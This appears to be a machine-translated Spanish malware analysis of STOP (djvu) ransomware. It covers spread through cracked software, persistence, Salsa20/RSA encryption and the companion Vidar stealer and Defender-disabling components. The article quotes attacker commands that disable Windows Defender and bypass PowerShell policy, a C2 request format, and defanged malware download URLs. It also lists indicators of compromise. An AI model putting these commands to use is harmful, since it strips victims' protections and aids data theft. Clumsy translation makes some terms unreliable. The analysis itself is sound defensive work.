¡Rescate por tus hábitos sombríos!


Tiempo estimado de lectura: 9 9 minutos

Con casi 200 extensiones, se puede decir que el ransomware STOP (djvu) es el ransomware más activo y extendido de 2019. Aunque este ransomware estuvo activo un año antes, comenzó su campaña agresivamente a principios de 2019. Para evadir la detección, ha estado cambiando continuamente sus extensiones y cargas útiles. Para infecciones anteriores, la recuperación de datos era más fácil si la clave no estaba en línea. CnC generado. Una vez que se recibió la carga útil, el descifrado fue más fácil ya que utilizó algoritmos de cifrado no simétricos y para los sistemas fuera de línea, usó el mismo conjunto de claves. Ha habido un cambio en su estrategia de cifrado desde mediados de 2019, lo que dificultó el descifrado de los archivos infectados. Al observar la mejora continua en los vectores de infección y las cargas útiles, uno puede considerar a los actores de STOP como uno de los autores de malware más activos de 2019.

Aquí, discutiremos en detalle sobre su comportamiento y la técnica actualizada de cifrado de archivos. También veremos sus actividades paralelas de descarga de otro malware y su comportamiento. Las estadísticas elaborarían su prominencia en los últimos meses.

Vectores de infección:

Según nuestra telemetría, este ransomware se propaga a través de aplicaciones agrietadas, keygen, activadores, configuración de aplicaciones falsas y actualizaciones de ventanas falsas. Mientras observamos los vectores de infección y el rescate exigido, podemos decir que estos actores creían en la cantidad en lugar de la calidad como Ryuk. Según nuestras observaciones, se vieron archivos rajados o activadores falsos para diferentes programas informáticos como Tally, Autocad, Adobe Photoshop, Internet Download Manager, Microsoft Office, navegador Opera, VMware Workstation, Quick Heal Total Security, etc., propagando este ransomware.

Comportamiento de la carga útil:

Fig. 1: ProcessMap

La carga principal de STOP (djvu) tiene muchas técnicas anti-emulación y anti-depuración implementadas por su contenedor común, que se cree que se usa para la mayoría de las cargas útiles. Se ve que pocos ransomware evitan el cifrado para un conjunto particular de países, dependiendo de la región de origen y la fuerza de las víctimas para pagar el rescate. Para eso, hemos observado el uso de diseños de teclado para identificar el país del sistema de la víctima. Aquí, los autores de STOP no se basaron en técnicas heredadas, ya que podría haber una posibilidad de error. La carga útil verifica la ubicación del sistema visitando "Https (:) // api.2ip.ua/geo.json" donde en respuesta obtenemos información sobre la ubicación y la zona horaria del sistema.

En respuesta a esta solicitud, se reciben detalles de la ubicación, incluida la longitud, la latitud, la zona horaria junto con el país y la ciudad.

Fig. 2: Respuesta IP

El código de país recuperado se compara con algunos otros códigos de país. Si coincide con alguno de los códigos de país enumerados, la carga útil no se ejecuta más. La siguiente imagen muestra la comparación del código de país antes del cifrado.

Fig. 3: Comparación del código de país

Una vez que confirma que la víctima no es de uno de los países alistados, crea una carpeta con UUID o GUID utilizado como su nombre en el directorio "% AppData% Local ". Después de eso, la carga útil crea una copia automática en esta ubicación y los controles de acceso de este archivo se cambian usando Ical icals ’ por el siguiente comando:

"Icacls "% AppData% \ Local \ UuId "/ deny * S-1-1-0: (OI) (CI) (DE, DC)"

Donde OI: Heredar objeto, CI: Heredar contenedor, DE: Eliminar, DC: Eliminar hijo

Nuevamente después de esto, la carga útil se ejecuta desde su ubicación original al elevar los derechos de acceso como administrador usando

ewrewexcf.exe –Admin IsNotAutoStart IsNotTask

Además, finaliza el proceso padre. Los parámetros confirman que el proceso no es iniciado por programas de inicio automático ni es una tarea programada y se ejecuta como administrador. Este proceso recién ejecutado crea una entrada del planificador de tareas usando TaskSchedulerCOM en:

C: Windows System32 Tasks Time Trigger Task

Fig. 4: Tarea de activación de tiempo

Luego recupera la dirección MAC del sistema usando GetAdaptersInfo (). Luego se calcula un hash MD5 de esta dirección MAC utilizando las API de cifrado de Windows y luego se usa para identificar de forma exclusiva el sistema. Se envía una solicitud a CnC malicioso utilizando este hash MD5, que obtiene la clave pública RSA-2048 y el identificador de cifrado del sistema, es decir, una identificación personal como respuesta.

Formato de solicitud:

http: // ring2 (.) ug / As73yhsyU34578hxxx / SDf565g / get.php? pid = Mac Address_MD5 & first = true

Esta respuesta se almacena en % AppData% Local bowsakkdestx.txt. Esta clave se usa más en el cifrado de archivos, que discutiremos más adelante. Además, la ID recibida junto con la clave pública se almacena en C: SystemID PersonalID.txt Para futura referencia.

Mientras recibe la identificación personal y la clave pública, la carga útil del ransomware también descarga un par de otros programas maliciosos del servidor CnC. Consiste en un infame ladrón de información, es decir, Vidar y una carga útil troyana que es similar a Vilsel visto anteriormente.

Fig. 5: Solicitudes de descarga de archivos

En la figura 5, ‘5.exe’ fue descargado y es una de las cargas útiles de Vidar, mientras que ‘Updatewin1.exe’ fue Vilsel. La actividad lateral de estos componentes se discutirá más adelante.

Por persistencia, junto con la tarea de activación de tiempo, también crea una entrada de registro RUN:

HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Run “SysHelper” = “% AppData% Local UuId 34efcdsax.exe” –AutoStart

Deja caer la nota de rescate a los directorios que ha enumerado. Antes del inicio del proceso de cifrado, un mutex 1D6FC66E – D1F3 – 422C – 8A53 – C0BBCF3D900D es creado. Este mutex es común en toda la campaña STOP-Djvu.

Comprueba particularmente la presencia de archivo I: 5d2860c89d774.jpg y si está presente, cifra este archivo.

Cifrado de archivos:

El cifrado de archivos implica 2 tipos:

  • Cifrado con clave en línea
  • Cifrado con clave sin conexión

En el primer escenario, la carga intenta establecer una conexión con CnC enviando una solicitud de clave pública e ID generadas por el servidor utilizando el hash MD5 asociado de la dirección MAC del sistema. La respuesta se guarda en bowsakkdestx.txt. Para el cifrado, esta clave se usa en el futuro.

En el último tipo de encriptación, si STOP ransomware no puede obtener una respuesta del CnC, verifica la existencia de bowsakkdestx.txt a "% AppData% / Local" directorio. Si se encuentra el archivo, busca la palabra clave "Clave pública" en el archivo. Si el archivo no contiene una clave pública, la carga útil elimina el archivo y nuevamente busca la respuesta de CnC. Por otro lado, si el archivo no está presente, entonces usa la clave pública y la ID que ya están presentes en el archivo. La mayoría de las cadenas en la carga útil están presentes en forma cifrada, es decir, XOR con la clave de byte 0x80. Las cargas útiles recientes de stop tienen una identificación fuera de línea que se agrega con su nombre de extensión y "t1".

ex: Z4aT0c1B4eHWZwaTg43eRzyM1gl3ZaaNVHrecot1

Pocos tipos de archivos y directorios se omiten del proceso de cifrado en función de la ruta y las extensiones de archivo.

Extensiones excluidas:

.sys .ini .dll .blf .bat .lnk .regtrans-ms

Junto con las extensiones anteriores, también se evita la extensión utilizada por la carga útil para indicar el cifrado.

Archivos excluidos:

ntuser.dat ntuser.dat.LOG1 ntuser.dat.LOG2 ntuser.pol _readme.txt

Las carpetas en el directorio de Windows y las carpetas del navegador en el directorio de Archivos de programa se excluyen del cifrado.

Antes del cifrado, también verifica el marcador de cifrado de archivos, es decir "36A698B9-D67C-4E07-BE82-0EC5B14B4DF5" que se encuentra al final del archivo seguido de la ID de cifrado.

Mientras encripta un archivo, mantiene los primeros 5 bytes del archivo tal como está. El resto de los datos del archivo se encripta con el algoritmo Salsa20. Para el cifrado de datos de archivo, se crea UUID y se utiliza como clave para el algoritmo Salsa20. De esta manera, cada archivo usa un nuevo UUID y la clave única se usa para el cifrado de cada archivo. A continuación se muestra un ejemplo de una clave Salsa20.

Fig.6: Clave Salsa20

Después del cifrado de los datos del archivo, el UUID utilizado como clave Salsa20 también se cifra con la clave pública RSA-2048 que se recibió del servidor CnC. En el caso del cifrado fuera de línea, esta clave se recupera de la carga útil. El UUID cifrado se agrega después de los datos del archivo cifrado. La identificación personal que se recibió nuevamente del servidor con la clave pública RSA-2048 se adjunta al UUID cifrado. Si los archivos se cifran sin conexión, esta identificación personal también se recupera del archivo y es común para todas las víctimas infectadas sin conexión. Al final del archivo, marcador de cifrado ‘36A698B9-D67C-4E07-BE82-0EC5B14B4DF5’ está escrito.

Fig. 7: Estructura de cifrado de archivos

Actividad lateral

1. Vidar (5.exe)

Vidar es un conocido troyano ladrón de información, que recopila información confidencial de su sistema y luego la entrega a su CnC. La información que puede robar incluye:

  • Datos de inicio de sesión del navegador, historial, cookies
  • Caché de navegador
  • Información del sistema
  • Datos del software de mensajería / correo electrónico
  • Datos de software de autenticación de dos factores

Comprueba la presencia de varios navegadores y software, incluidas las herramientas de autenticación de dos factores.

Fig. 8: Acceso al archivo Vidar

Almacena datos robados en una carpeta con nombre aleatorio en el ProgramData directorio. En este directorio, se crean pocos archivos ".zip" que contienen archivos como información.txt que tiene detalles del usuario y la máquina, los procesos en ejecución y el software instalado en el sistema. Las contraseñas / credenciales recuperadas de los navegadores y otro software se almacenan en passwords.txt. El resto de la información se almacena en directorios / archivos con los respectivos nombres de software.

Fig. 9: Escritura de archivo Vidar

Hay un archivo adicional llamado CARNÉ DE IDENTIDAD que contiene datos en forma de base de datos SQL que tiene tablas como inicios de sesión, meta, estadísticas, sync_entities_metadata y sync_model_metadata. Estas tablas tienen principalmente datos del usuario relacionados con el navegador. Todos estos datos se envían a CnC de Vidar, que es hxxp: // crarepo (.) com / en este caso. Los cambios en los servidores CnC se observan durante el período.

Fig.10: Vidar HttpSendRequestA

2. Updatewin1.exe:

Este componente se utiliza principalmente para ocultar la existencia del ransomware o evadir la detección basada en el comportamiento del malware. Muestra similitud con la familia de troyanos Vilsel.

En primer lugar, se ejecuta con privilegios elevados. Este proceso con privilegios elevados ejecuta PowerShell con la siguiente línea de comando, para cambiar la política de ejecución de forma predeterminada restringida a RemoteSigned, lo que resulta en la ejecución de políticas locales sin ninguna firma digital.

powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned

Fig. 11: Updatewin RegSetValue

El updatewin1.exe luego descarta script.ps1 que tiene el comando ‘Set-MpPreference -DisableRealtimeMonitoring $ true’ a %temperatura% ubicación. Se inicia una nueva instancia de PowerShell con parámetros:

-NoProfile -ExecutionPolicy Bypass -Command "& {Start-Process PowerShell -ArgumentList‘ -NoProfile -ExecutionPolicy Bypass -File% AppData% Local script.ps1 ″ "‘ -Verb RunAs.

Esto ejecuta PowerShell con privilegios de administrador y omite todas las políticas de ejecución para la instancia actual de PowerShell. Esto ejecuta script.ps1 resultando en la desactivación de Windows Realtime Protection. También elimina las actualizaciones / firmas descargadas de Windows Defender usando el comando:

mpcmdrun.exe -removedefinitions -all

El administrador de tareas también se deshabilita cambiando el registro y luego updatewin1.exe se elimina usando un archivo por lotes.

3. Updatewin.exe:

Este componente no tiene actividad sospechosa o maliciosa. Simplemente muestra el mensaje de actualización de Windows para que cualquiera de las actividades sospechosas se considere como cambios de actualización de Windows. No hay una opción para minimizar o cerrar esta ventana, uno tiene que matar el proceso para deshacerse de él.

Fig. 12: Ventana de actualización falsa

Nota de rescate:

Fig.13: _readme.txt Nota de rescate

Durante la campaña, la nota de rescate STOP se ha mantenido igual con pocos pequeños cambios. Pide $ 980 de rescate y ofrece un descuento del 50% si el pago se realiza dentro de los 3 días. La conversación con las víctimas se realiza por correo. La nota de rescate contiene el ID personal del usuario que también se almacena en C: SystemID PersonalID.txt.

Estadísticas:

Fig. 14: Estadísticas

Desde la introducción de la nueva variante RSA 2048, hemos visto un aumento notable en las infecciones. Como se indica en el cuadro anterior, hubo un aumento gradual de agosto a noviembre con visitas que superaron la marca de 120,000. Sin embargo, ha habido una disminución en las visitas en diciembre, que parece haber continuado en el mes de enero.

Conclusión:

Desde el comienzo de la campaña STOP-djvu, detener a los autores se han centrado en cambiar las cargas útiles y las extensiones en intervalos cortos, haciendo que su presencia entre el ransomware sea fuerte y sólida. Inicialmente, los autores creían en la criptografía simétrica, esperando el rescate de la mayoría de los casos con cargas útiles más nuevas y claves únicas para cada variante. Los descifradores gratuitos para las infecciones fuera de línea los obligaron a cambiar a la criptografía asimétrica, lo que dificultó el descifrado de nuevas infecciones. Además, la propagación a través del software de crack múltiple, activadores, software keygen y actualizaciones falsas de software / SO, ha sido una forma efectiva de propagación de este ransomware.

COI:

Hashes:

74A9A644307645D1D527D7D39A87861C

F64CF802D1E163260F8EBD224E7B2078

959B266CAD13BA35AEE35D8D4B723ED4

9EE3B1BCF67A63354C8AF530C8FA5313

5B4BD24D6240F467BFBC74803C9F15B0

B0A89E143BABDA2762561BC7576017D7

290E97907E5BE8EA72178414762CD846

E3083483121CD288264F8C5624FB2CD1

URLs:

hxxp: // ring2 (.) ug / files / penelop / 3.exe

hxxp: // ring2 (.) ug / files / penelop / 4.exe

hxxp: // ring2 (.) ug / files / penelop / 5.exe

hxxp: // ring2 (.) ug / files / penelop / updatewin.exe

hxxp: // ring2 (.) ug / files / penelop / updatewin1.exe

hxxp: // ring2 (.) ug / files / penelop / updatewin2.exe

hxxp: // crarepo (.) com /

<! –

COMPARTE ESTA HISTORIA

->


Software de crack,
agrietado,
DJVU
Aplicaciones falsas,
icacls,
infostealer,
KeyGen,
Clave sin conexión,
Clave en línea,
Potencia Shell,
Secuestro de datos,
salsa20,
DETENER,
SysHelper,
Tarea de activación de tiempo,
TimeTriggerTask,
Vidar
Vilsel
actualizacion de Windows,
_readme.txt,
1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D,
36A698B9-D67C-4E07-BE82-0EC5B14B4DF5

¿Tienes algo que agregar a esta historia? Compártelo en el



Enlace a la noticia original